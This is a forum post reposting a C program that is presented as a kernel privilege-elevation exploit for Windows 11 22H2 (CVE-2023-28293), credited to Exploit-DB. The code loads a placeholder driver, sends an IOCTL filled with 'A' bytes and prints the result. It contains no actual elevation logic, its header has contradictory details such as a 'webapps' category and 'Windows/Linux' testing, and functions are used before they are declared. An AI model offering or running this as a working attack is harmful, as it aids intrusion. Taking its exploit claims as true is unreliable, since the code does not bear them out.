Jump to content
GabrielRo

Windows 11 22h2 - Kernel Privilege Elevation

Recommended Posts

Posted (edited)
// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : webapps
// Vendor Homepage:
// Tested on: Windows/Linux
// CVE : CVE-2023-28293

#include <windows.h>
#include <stdio.h>

// The vulnerable driver file name
const char *driver_name = "vuln_driver.sys";

// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";

// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003

// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000

int main()
{
    HANDLE device;
    DWORD bytes_returned;
    char input_buffer[IOCTL_BUFFER_SIZE];
    char output_buffer[IOCTL_BUFFER_SIZE];

    // Load the vulnerable driver
    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
    {
        printf("Error loading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Open the vulnerable driver device
    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        printf("Error opening vulnerable driver device: %d\n", GetLastError());
        return 1;
    }

    // Fill the input buffer with data to trigger the vulnerability
    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);

    // Send the IOCTL to trigger the vulnerability
    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
    {
        printf("Error sending IOCTL: %d\n", GetLastError());
        return 1;
    }

    // Print the output buffer contents
    printf("Output buffer:\n%s\n", output_buffer);

    // Unload the vulnerable driver
    if (!UnloadDriver("\\Driver\\VulnDriver"))
    {
        printf("Error unloading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Close the vulnerable driver device
    CloseHandle(device);

    return 0;
}

BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Create the service
    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
    if (service == NULL)
    {
        error = GetLastError();
        if (error == ERROR_SERVICE_EXISTS)
        {
            // The service already exists, so open it instead
            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
            if (service == NULL)
            {
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
        else
        {
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Start the service
    if (!StartService(service, 0, NULL))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}

BOOL UnloadDriver(LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    SERVICE_STATUS status;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Open the service
    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
    if (service == NULL)
    {
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    // Stop the service
    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_NOT_ACTIVE)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Delete the service
    if (!DeleteService(service))
    {
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}

 

Source: https://www.exploit-db.com/exploits/51544

Edited by GabrielRo

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...